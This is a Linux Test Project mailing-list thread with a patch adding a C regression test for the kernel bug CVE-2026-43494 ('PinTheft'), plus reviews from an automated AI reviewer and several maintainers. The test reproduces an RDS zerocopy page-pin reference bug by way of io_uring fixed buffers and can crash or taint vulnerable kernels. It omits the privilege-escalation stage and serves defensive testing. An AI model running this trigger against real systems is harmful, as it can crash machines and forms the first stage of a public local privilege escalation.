@@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
cve-2026-46300 xfrm02
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..6601c87ca
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,424 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
+#ifndef RDS_CMSG_ZCOPY_COOKIE
+#define RDS_CMSG_ZCOPY_COOKIE 12
+#endif
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct io_uring_clone_buffers clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, &params);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(&params, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, &params);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
+ * errors do not count as successful pin-theft iterations.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .timeout = 60,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
@ 2026-05-23 18:07 ` linuxtestproject.agent
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
2026-05-28 16:36 ` Martin Doucha
2 siblings, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 18:07 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, 23 May 2026 18:57:18 +0200, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
[...]
> +#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
> +struct io_uring_clone_buffers {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
> +#endif
The fallback struct doesn't match the upstream kernel definition
(include/uapi/linux/io_uring.h). The kernel has:
struct io_uring_clone_buffers {
__u32 src_fd;
__u32 flags;
__u32 src_off;
__u32 dst_off;
__u32 nr;
__u32 pad[3];
};
Total size is the same (8 × u32 = 32 bytes), so the test happens to
work correctly because you zero the whole struct and only set src_fd.
But the lapi header is wrong: future users who try to set src_off,
dst_off, or nr will write into pad[] instead of the real fields. Fix
the fallback to match the kernel layout.
[...]
> + for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
[...]
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
The RDS socket is opened with SOCK_CLOEXEC but no O_CLOEXEC is set
on the io_uring ring fds (ring_fd1, ring_fd2). Both rings are
therefore inherited by the fork()ed child. trigger() -> cleanup()
unregisters buffers from the *shared* io_uring instances before the
child exits, so the parent's cleanup() hits IORING_UNREGISTER_BUFFERS
on already-unregistered rings. The return value of io_uring_register()
in cleanup() is silently ignored, so this doesn't crash, but it means
the "double-unpin WARN/BUG_ON" can fire in the child's cleanup pass
before the parent even gets to check taint. Consider opening the ring
fds with O_CLOEXEC so the child only operates on the rds socket, or
document the intentional sharing explicitly.
[...]
Summary: the struct io_uring_clone_buffers fallback definition must be
corrected to match the kernel layout before merging.
---
Note:
Our agent completed the review of the patch. The agent can sometimes
produce false positives although often its findings are genuine. If you
find issues with the review, please comment on this email or ignore the
suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
@ 2026-05-24 18:16 ` Petr Vorel
2026-05-28 16:45 ` Martin Doucha
2026-05-28 16:36 ` Martin Doucha
2 siblings, 1 reply; 19+ messages in thread
From: Petr Vorel @ 2026-05-24 18:16 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: Sebastian Chlad, ltp
Hi Sebastian,
> Test for PinTheft (CVE-2026-43494), fixed by:
> e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
Thank you!
> The bug is in the RDS zerocopy send error path: when pinning user pages
> for zerocopy send fails partway through, the error cleanup drops a page
> reference that the RDS message cleanup will drop again. Combined with
> io_uring fixed buffer registrations, this double-drop drains the
> FOLL_PIN counter and causes a page-cache overwrite exploitable for local
> privilege escalation (PinTheft).
...
> +static void setup(void)
> +{
> + struct io_uring_params params = {};
> + struct iovec fixed_iov;
> + int val;
> +
> + page_size = SAFE_SYSCONF(_SC_PAGESIZE);
> + io_uring_setup_supported_by_kernel();
> +
> + /*
> + * The exploit primitive keeps one fixed-buffer registration alive and
> + * clones it to another ring.
> + */
> + ring_fd1 = io_uring_setup(1, &params);
> + if (ring_fd1 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
> +
> + memset(&params, 0, sizeof(params));
> +
> + ring_fd2 = io_uring_setup(1, &params);
> + if (ring_fd2 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
> +
> + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> + if (rds_fd < 0) {
> + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
> + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
> + tst_brk(TCONF | TERRNO, "RDS is not available");
> +
> + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
Just a quick Sunday evening comment (not yet looking into the reproducer itself).
I wonder if we need this complicated check when we already have kconfig based
checks at the end. Could we just simply use SAFE_SOCKET() here? Or have you
encountered problems with older kernels?
And I haven't found any sysctl check (it's just a kernel module), which would be
then part of lib/tst_kconfig.c.
> + }
> +
> + /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
> + val = RDS_TRANS_TCP;
> + TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
> +
> + if (TST_RET) {
> + if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
> + tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
> +
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
And the same here just SAFE_SETSOCKOPT() ?
> + }
...
> + /*
> + * Register only the first page as an io_uring fixed buffer. This creates
> + * the long-term page pin whose reference accounting the RDS bug damages.
> + */
> + if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
> +
> + buffer_registered = 1;
> +
> + /*
> + * Clone the fixed buffer registration into the second ring, matching the
> + * public reproducer's lifetime pattern without performing the later
> + * page-cache overwrite stage.
> + */
> + if (clone_buffers(ring_fd2, ring_fd1)) {
> + if (errno == EINVAL || errno == EOPNOTSUPP)
> + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
Also here do we need it? IMHO CONFIG_IO_URING should be enough.
And if errno is really needed, it'd IMHO be better for it to be handled in
clone_buffers(), not separately.
> +
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
> + }
...
> + /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
> + val = 1;
> + if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
> + if (errno == ENOPROTOOPT || errno == EINVAL)
> + tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
And here I'd also simplify with SAFE_SETSOCKOPT().
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
> + }
...
> +static struct tst_test test = {
> + .test_all = run,
> + .setup = setup,
> + .cleanup = cleanup,
> + .timeout = 60,
> + .forks_child = 1,
> + .taint_check = TST_TAINT_W | TST_TAINT_D,
> + .needs_kconfigs = (const char *[]) {
> + "CONFIG_RDS",
> + "CONFIG_RDS_TCP",
CONFIG_RDS_TCP implies CONFIG_RDS.
Kind regards,
Petr
> + "CONFIG_IO_URING",
> + NULL
> + },
> + .save_restore = (const struct tst_path_val[]) {
> + {"/proc/sys/kernel/io_uring_disabled", "0",
> + TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
> + {}
> + },
> + .tags = (const struct tst_tag[]) {
> + {"linux-git", "e17492979319"},
> + {"CVE", "2026-43494"},
> + {}
> + }
> +};
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
@ 2026-05-25 9:36 ` Cyril Hrubis
2026-05-29 10:18 ` Andrea Cervesato via ltp
0 siblings, 1 reply; 19+ messages in thread
From: Cyril Hrubis @ 2026-05-25 9:36 UTC (permalink / raw)
To: linuxtestproject.agent; +Cc: ltp
Hi!
> The commit author address (sebastianchlad@gmail.com) does not match the
> Signed-off-by address (sebastian.chlad@suse.com). Either add a .mailmap
> entry or re-send with a consistent identity.
>
> > diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
> > [...]
> > +#ifndef IORING_REGISTER_CLONE_BUFFERS
> > +# define IORING_REGISTER_CLONE_BUFFERS 30
> > +#endif
>
> Use `#define` without the extra space after `#`. All other fallback
> defines in this file use `#define`, not `# define`.
This one is actually wrong. For historical reasons macros are indented
with spaces after the hash.
--
Cyril Hrubis
chrubis@suse.cz
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
@ 2026-05-28 16:36 ` Martin Doucha
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
2 siblings, 1 reply; 19+ messages in thread
From: Martin Doucha @ 2026-05-28 16:36 UTC (permalink / raw)
To: Sebastian Chlad, ltp; +Cc: Sebastian Chlad
Hi,
some suggestions below.
On 5/23/26 18:57, Sebastian Chlad wrote:
> Test for PinTheft (CVE-2026-43494), fixed by:
> e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
>
> The bug is in the RDS zerocopy send error path: when pinning user pages
> for zerocopy send fails partway through, the error cleanup drops a page
> reference that the RDS message cleanup will drop again. Combined with
> io_uring fixed buffer registrations, this double-drop drains the
> FOLL_PIN counter and causes a page-cache overwrite exploitable for local
> privilege escalation (PinTheft).
>
> Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
> ---
>
> v4: (fixing pointers listed by AI LTP)
> - Fix double blank line
> - Correct HAVE_STRUCT_IO_URING_CLONE_BUFFERS
>
> configure.ac | 1 +
> include/lapi/io_uring.h | 14 +
> runtest/cve | 1 +
> testcases/kernel/syscalls/io_uring/pintheft.c | 424 ++++++++++++++++++
> 4 files changed, 440 insertions(+)
> create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
>
> diff --git a/configure.ac b/configure.ac
> index 0653d7793..3a1283ac3 100644
> --- a/configure.ac
> +++ b/configure.ac
> @@ -255,6 +255,7 @@ AC_CHECK_TYPES([struct __kernel_old_timeval, struct __kernel_old_timespec, struc
> struct __kernel_old_itimerval],,,[#include <sys/socket.h>])
>
> AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
> +AC_CHECK_TYPES([struct io_uring_clone_buffers],,,[#include <linux/io_uring.h>])
> AC_CHECK_TYPES([struct mount_attr],,,[
> #ifdef HAVE_MOUNT_SETATTR
> # include <sys/mount.h>
> diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
> index 2026863a2..5c6f9a785 100644
> --- a/include/lapi/io_uring.h
> +++ b/include/lapi/io_uring.h
It'd be better to submit LAPI changes as a separate commit.
> @@ -265,6 +265,20 @@ struct io_uring_probe {
>
> #endif /* IOSQE_FIXED_FILE */
>
> +/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
> +#ifndef IORING_REGISTER_CLONE_BUFFERS
> +#define IORING_REGISTER_CLONE_BUFFERS 30
> +#endif
> +
> +/* Argument for IORING_REGISTER_CLONE_BUFFERS */
> +#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
> +struct io_uring_clone_buffers {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
> +#endif
> +
> #ifndef IOSQE_IO_HADRLINK
> /* like LINK, but stronger */
> #define IOSQE_IO_HARDLINK_BIT 3
> diff --git a/runtest/cve b/runtest/cve
> index 74ee8e9ba..32a0f237d 100644
> --- a/runtest/cve
> +++ b/runtest/cve
> @@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
> cve-2025-21756 cve-2025-21756
> cve-2026-31431 af_alg08
> cve-2026-43284 xfrm01
> +cve-2026-43494 pintheft
> cve-2026-46300 xfrm02
> diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
> new file mode 100644
> index 000000000..6601c87ca
> --- /dev/null
> +++ b/testcases/kernel/syscalls/io_uring/pintheft.c
I recommend renaming the file to io_uring04.c.
> @@ -0,0 +1,424 @@
> +// SPDX-License-Identifier: GPL-2.0-or-later
> +/*
> + * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
> + */
> +
> +/*\
> + * CVE-2026-43494
> + *
> + * Test for PinTheft, fixed by:
> + * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
> + *
> + * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
> + * zerocopy send and a later page faults, the error cleanup can drop references
> + * for pages that are later released again during RDS message cleanup. This
> + * corrupts page reference accounting.
> + *
> + * The public exploit combines this RDS reference-counting bug with io_uring
> + * fixed buffers and cloned buffer registrations to turn stale page references
> + * into a page-cache overwrite and local privilege escalation.
> + *
> + * This test does not attempt privilege escalation. It triggers the underlying
> + * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
> + * iovecs where the first page is registered as an io_uring fixed buffer and
> + * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
> + * reference; after 1024 sends the io_uring-held page pin is exhausted.
> + * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
> + * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
> + * BUG_ON and tainting the kernel.
> + *
> + * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
> + * subsequent cleanup. Run only on disposable systems.
> + *
> + * Reproducer is based on:
> + * https://github.com/v12-security/pocs/tree/main/pintheft
> + */
> +
> +#include <errno.h>
> +#include <netinet/in.h>
> +#include <stdint.h>
> +#include <stdlib.h>
> +#include <string.h>
> +#include <sys/mman.h>
> +#include <sys/socket.h>
> +#include <sys/uio.h>
> +#include <sys/wait.h>
> +#include <unistd.h>
Most of these header files are included by tst_test.h. You don't need to
include them explicitly.
> +
> +#include <linux/rds.h>
> +
> +/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
> +#ifndef RDS_CMSG_ZCOPY_COOKIE
> +#define RDS_CMSG_ZCOPY_COOKIE 12
> +#endif
It'd be better to have this fallback #define in LAPI.
> +
> +#include "tst_test.h"
> +#include "lapi/io_uring.h"
> +#include "lapi/socket.h"
> +
> +#define CLEANUP_WAIT_SECS 30
Isn't 30 seconds a bit too much?
> +#define RSS_CHECK_CHILDREN 8
> +#define RSS_CHECK_SIZE (16 * 1024 * 1024)
> +
> +/*
> + * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
> + * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
> + * RDS zerocopy send steals one of those references via the double-drop bug.
> + * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
> + */
> +#define GUP_PIN_COUNTING_BIAS 1024
> +
> +static int ring_fd1 = -1;
> +static int ring_fd2 = -1;
> +static int rds_fd = -1;
> +static int buffer_registered;
> +static int buffer_cloned;
> +static long page_size;
> +static void *mapped_pages;
> +
> +static void cleanup(void);
> +
> +/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
> +static int clone_buffers(int dst_fd, int src_fd)
> +{
